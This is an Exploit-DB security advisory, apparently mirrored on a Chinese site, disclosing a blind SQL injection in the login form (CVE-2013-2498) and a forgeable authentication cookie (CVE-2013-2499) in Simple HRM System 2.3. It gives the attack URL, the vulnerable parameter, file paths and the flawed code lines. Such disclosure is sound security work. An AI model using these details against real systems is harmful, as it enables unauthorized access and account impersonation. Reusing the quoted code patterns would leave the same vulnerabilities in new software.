Simple HRM System 2.3 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Doraemon
  日期： 2013-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24954/

• # Exploit Title: Multiple Vulnerabilities in Simple HRM system v2.3 and
  below
  # Date: 12/04/2013
  # Exploit Author: Doraemon
  # Vendor Homepage: http://www.simplehrm.com/
  # Software Link: http://sourceforge.net/projects/simplehrm/
  # Version: 2.2/2.3
  # Tested on: 2.2 & 2.3
  # CVE : CVE-2013-2498, CVE-2013-2499
  
  Date Discovered: 07 March 2013
  
  Vendor notified: 12 march 2013 (No response from vendor after 1 month)
  
  Advisory posted: 12 April 2013
  
  *
  *
  
  *CVE-2013-2498*
  
  Simple HRM system is vulnerable to sqli attacks in their login page
  
  An attacker can perform blind sql injection through the login form and
  obtain information such as password hash.
  
  *Attack URL:* http://localhost/simplehrm/index.php/user/setLogin
  *Method:* POST
  *Vuln Parameter: *username=*(SQL INJECTION)*&password=abcdef
  *Vuln Type*: unsanitised input argument *($name)* in
  *Vuln **File:* simlehrm/flexycms/modules/user/user_manager.php
  *Line:* 84
  $res_company = getsingleindexrow('CALL
  get_search_sql("'.TABLE_PREFIX.'company","email_id = \''.$name.'\' AND
  isactive = 1 LIMIT 1")');
  
  *CVE-2013-2499*
  
  We discovered that if an attacker were to grab hold of the user's password
  hash, the attacker can easily spoof a cookie and impersonate as anyone to
  access the system. Together with the blind sql injection stated above, an
  attacker can simply blind the password hash, userid, username and recreate
  a cookie.
  
  *Vuln **File:* simlehrm/flexycms/modules/user/user_manager.php
  *Line:* 215 $v_user_password =
  md5($info['id_user'].$info['username'].$info['password']);
  
  This vuln effectively defeats one of the primary purposes of password hashing.
  
  
  Regards
  
  Doraemon